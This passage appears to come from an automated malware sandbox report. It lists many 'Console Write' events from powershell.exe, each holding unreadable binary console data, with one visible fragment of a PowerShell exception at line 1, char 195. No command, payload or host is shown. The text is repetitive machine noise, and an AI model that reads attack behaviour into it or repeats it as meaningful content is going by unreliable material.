          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pa:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(b:.............................}..v.....b:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pi:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(j:.............................}..v.....j:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....pq:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(r:.............................}..v.....r:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....py:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(z:.............................}..v.....z:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p!;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(";.............................}..v.....";.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p);.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(*;.............................}..v.....*;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p1;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(2;.............................}..v.....2;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p9;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(:;.............................}..v.....:;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k.... ...............................}..v....pA;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Y..k....(B;.............................}..v.....B;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..................k.... ...............................}..v....pI;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............Y..k....(J;.............................}..v.....J;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..................k.... ...............................}..v....pQ;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............Y..k....(R;.............................}..v.....R;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K..................k.... ...............................}..v....pY;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............Y..k....(Z;.............................}..v.....Z;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W..................k.... ...............................}..v....pa;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............Y..k....(b;.............................}..v.....b;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c..................k.... ...............................}..v....pi;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............Y..k....(j;.............................}..v.....j;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o..................k.... ...............................}..v....pq;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............Y..k....(r;.............................}..v.....r;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{..................k.... ...............................}..v....py;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............Y..k....(z;.............................}..v.....z;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......;.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v....0.;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v....0.;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .E.x.c.e.p.t.i.o.n.........................}..v......;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....(.;.....0.......................`.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v....`.;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ..........k.... ...............................}..v......;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v....(.;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....o......0.......................j.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....xp..............................}..v.....p......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.5.............}..v.....u......0.......................$.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Y..k.....u..............................}..v....@v......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..................k.... ...............................}..v.....}......0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............Y..k.....}..............................}..v....@~......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K..................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W..................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c..................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o..................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{..................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v............0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k.... ...............................}..v.....% .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............Y..k.....% .............................}..v....@& .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k.... ...............................}..v.....- .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............Y..k.....- .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k.... ...............................}..v.....5 .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............Y..k.....5 .............................}..v....@6 .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k.... ...............................}..v.....= .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............Y..k.....= .............................}..v....@> .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k.... ...............................}..v.....E .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............Y..k.....E .............................}..v....@F .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k.... ...............................}..v.....M .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............Y..k.....M .............................}..v....@N .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k.... ...............................}..v.....U .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............Y..k.....U .............................}..v....@V .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....] .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....] .............................}..v....@^ .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....e .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....e .............................}..v....@f .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....m .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....m .............................}..v....@n .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....u .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....u .............................}..v....@v .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....} .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....} .............................}..v....@~ .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
